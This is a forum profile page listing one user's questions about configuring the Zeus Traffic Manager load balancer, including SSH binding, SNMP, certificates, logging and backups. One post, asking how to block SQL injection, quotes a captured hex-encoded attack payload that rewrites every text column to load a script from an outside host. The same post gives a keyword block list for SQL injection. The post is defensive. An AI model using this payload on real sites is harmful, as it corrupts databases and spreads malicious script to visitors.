Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - Kosch

Pages: [1]
1
Zeus Traffic Manager / bind management ports to one IP
« on: December 03, 2012, 04:18:27 pm »
Hi

We are using ZXTM 8.1. I have logged this with CSR but whilst I wait for a response thought I would also post here :)

We are trying to run a SSH/SFTP virtual server on our traffic manager and have discovered that no matter what TIP we use when we connect with SSH/SFTP it actually connects us to the ZXTM appliance rather than the node in the pool that's selected to be used by the virtual server.

I seem to remember in previous versions of the ZXTM you could tell it to bind its management and SSH ports to only one IP address (IE the base IP you assign to the NIC Team) but I can’t seem to find mention of this anywhere in the interface now.



2
Zeus Traffic Manager / ZXTM and TMG 2010
« on: September 08, 2011, 05:36:59 pm »
Hello

I'm setting up a test lab of TMG 2010 in an array configuration of two servers to be used as just generic http/s proxy servers. I then use the ZXTM as the external load balancer that the clients connect to to give it fault tolerance.

I've had to set the virtual server to generic client first so my clients browsers can connect to SSL enabled websites.

The only downside to this is now I cannot apply traffic script rules, namley x-forwarded-for so the logging mechanism on TMG can then interpret the header as the originating request.

Can anyone think of a way around this?

3
Zeus Traffic Manager / Monitor bandwidth class consumption via SNMP?
« on: August 03, 2011, 04:47:09 pm »
Hi

I've been using the MIB provided on the ZXTM to attempt to monitor when a bandwidth class is reaching its cap but I'm not having much luck at the values returned by bandwidthClassBytesOutLo.IOD seem to be the total value of bytes output.

If I look at the graphs in the admin interface for a particular class it shows me exactly what I want.

How I can replicate this so I can alert & report on it via snmp?

Cheers

4
Zeus Traffic Manager / Failed to import Certificate (Certificate does not match private key)
« on: January 11, 2011, 02:58:00 pm »
I'm having some trouble importing a wildcard cert. I did this a few months ago for another domain with no issues.

I keep getting this message but cant work out as to why

Failed to import Certificate (Certificate does not match private key)

Anyone come across this before?

5
Zeus Traffic Manager / IIS 7.0/7.5 with x-forwarded and client ip in logs.
« on: December 08, 2010, 06:49:02 pm »
Hello

Has anyone found a way to make IIS 7.0/7.5 log the x-forwarded-for value as the clients IP in the IIS logs. With IIS 6.0 we just used an ISAPI filter provided by our Zeus reseller but this no longer works with the latest greatest.

I dont really want to enable logging on the traffic manager if I can get away with it.

I did try this but as my comment on the post suggests I couldnt get it working.

http://blogs.iis.net/anilr/archive/2009/03/03/client-ip-not-logged-on-content-server-when-using-arr.aspx


6
Zeus Traffic Manager / bytes sent via request logging - is this the compressed or uncompressed version?
« on: October 22, 2010, 02:57:20 pm »
Hello

Just doing some stat analysis and was looking at how much javascript was being downloaded from one of our ajax heavy sites.

We do all the request logging on the ZXTM and I was wondering if "%b Number of bytes sent to the client" is compressed or uncompressed as we have gzip compression switched on for the virtual server.

Thanks

Doug


7
Zeus Traffic Manager / Create an account to be used with webservices - having trouble
« on: February 12, 2010, 04:58:26 pm »
Hi

We are using the webservice functionality of the ZXTM to enable & disable rules on virtualservers (downtime messages). We have a cute little desktop app that does all the calls so you click to enable/disable the rules.

The problem is this only seems to work when the user is part of the admin group on the ZXTM.

I have tried creating my own group, assigning the user to it & then giving it the required permissions in the virtual servers group ie enable/disable rules but no luck.

Is there something I am missing or something special that needs doing when using accounts with webservices?

Thanks

8
Zeus Traffic Manager / MS Net.TCP & ZXTM Virtual Servers?
« on: December 01, 2009, 05:48:54 pm »
For one of our new web applications (Developed in asp.net WCF) they are going to be using Net TCP for some of the web services that talk to each other internally (http://msdn.microsoft.com/en-us/library/ms734772.aspx) I dont know much about Net TCP as I've only just be introduced to the project for the web application. We currently have this configured in DEV and working but I'm just wondering if the is the best configuration or under load we might start to see some issues. I'll try and explain below.

So we have 1 virtual server and lets say 3 pools. The default pool is the Web UI layer and then through traffic script depending on what path is requested that then gets pushed through to one of the other 2 pools.


Virtual Server Listens on HTTP for 192.168.1.1
Default Pool (Web UI Layer) going to IIS 7.0 instance on Server 1 Port 80 192.168.1.2
Traffic script intercepts any requests for /error-logging/ & /db-query/ and passes them to the respective pools.
Error Logging Web Service going to IIS 7.0 instance on Server 2 Net TCP Port 5085 92.168.1.3
DB Query Service going to IIS 7.0 instance on Server 3 Net TCP Port 5085 92.168.1.4

Now lets say I configure the UI layer via my web.config to report any errors to "net.tcp://192.168.1.1/error/logging"

Obviously that will connect to the Virtual Server on port 80 and then pass through the request to Server 2 and this does seem to work.

I'm just a bit concerned that its a "net tcp" protocol rather than an "http" protocol and this may have some kind of an effect as the ZXTM is expecting regular http traffic or on the backend nodes.

Has anyone else used net tcp webservices in nodes and virtual servers with ZXTM 5.1r2 before.

Any comments, questions or dont be stupid! would be appreciated :)





9
Zeus Application Firewall Module / Anyone using this?
« on: October 02, 2009, 11:55:54 am »
Is anyone using this product in production?

Looking for thoughts/comments etc.

10
Zeus Traffic Manager / Time Sync Error
« on: October 16, 2008, 02:00:43 pm »
Hi

Hi Guys

Swapping around the NTP servers on the ZXTM 4.2r1 to use the external ja.net ntp servers:

ntp0.ja.net
ntp1.ja.net
ntp2.ja.net
ntp3.ja.net

When I try and sync the time I get the message

"cannot find family compatible socket to send ntp packet"

I know the firewall rule is working correctly as I have a couple of windows DC’s syncing from the ja.net servers.

Have you seen this before?

11
Zeus Traffic Manager / SQL Injection Prevention Rules
« on: June 04, 2008, 02:24:11 pm »
Hi

I was wondering if anyone had any SQL Injection prevention rules they would care to share?

I've written a basic one but just wondering what everyone else is using?

We are seeing lots of attacks like this one where it seems some of the SQL attack is encoded into hex.

Is it possible to get the ZXTM to decode what is being sent to the server?

Code: [Select]
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E77696E3439362E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

Heres my basic rule. I'm not a programmer so it might not be that efficient.

Code: [Select]
$querystring = http.getquerystring();
$path = http.getpath();

if( string.contains( $querystring, "EXEC" )
        || string.contains( $querystring, "VARCHAR" )
        || string.contains( $querystring, "--" )
        || string.contains( $querystring, "sp_" )
        || string.contains( $querystring, "xp_" )
        || string.contains( $querystring, "exec" )
        || string.contains( $querystring, "sysobjects" )
        || string.contains( $querystring, "DECLARE" ) ){

        log.warn("SQL Injection! " . $path . "?" . $querystring );
       
        connection.discard();

}

12
Zeus Traffic Manager / Service Protection rule with custom http message
« on: March 25, 2008, 03:35:43 pm »
Hi

We are having a free access to all content for all current subscribers month and I'm setting up a service protection rule. Because of the nature of our content it would be potentially possible to write a bot to spider the site and pull down all of our PDF's although it would take a hell of a long time  :D

What I would like to do is protect against this so I have setup a service protection class. I noticed in the HTTP settings it says

Quote
Should ZXTM send an HTTP error message instead? ZXTM usually drops connections that fail the service protection class tests. Should ZXTM send an HTTP error message instead?

Is it possible to get it sent to a custom page that resides on the ZXTM. As on the off chance its not a bot just a click happy subscriber I would like to send them a friendly message explaining what has happened.

Thanks

Doug

13
Zeus Traffic Manager / Compress PDF's
« on: February 08, 2008, 11:36:16 am »
Hi

We serve alot of PDF's via our site and I was wondering if anyone had any experiences or thoughts on using compression with PDF's as I've seen a few posts across the net that say don't compress PDF's as it can cause problems when reading them in the browser due to the adobe reader byte streaming?

Any thoughts or comments would be appreciated.

Thanks

Doug

14
Zeus Traffic Manager / Automate Backup & Export to Windows File Share
« on: July 27, 2007, 11:41:56 am »
Hi

ZXTM 4.2

Anyone have any experience with automating a daily backup and then having it exported off to a windows file share

or

Using SOAP to create the backup and the SFTP'ing the backup across from the a windows box?


Thanks

Doug

Pages: [1]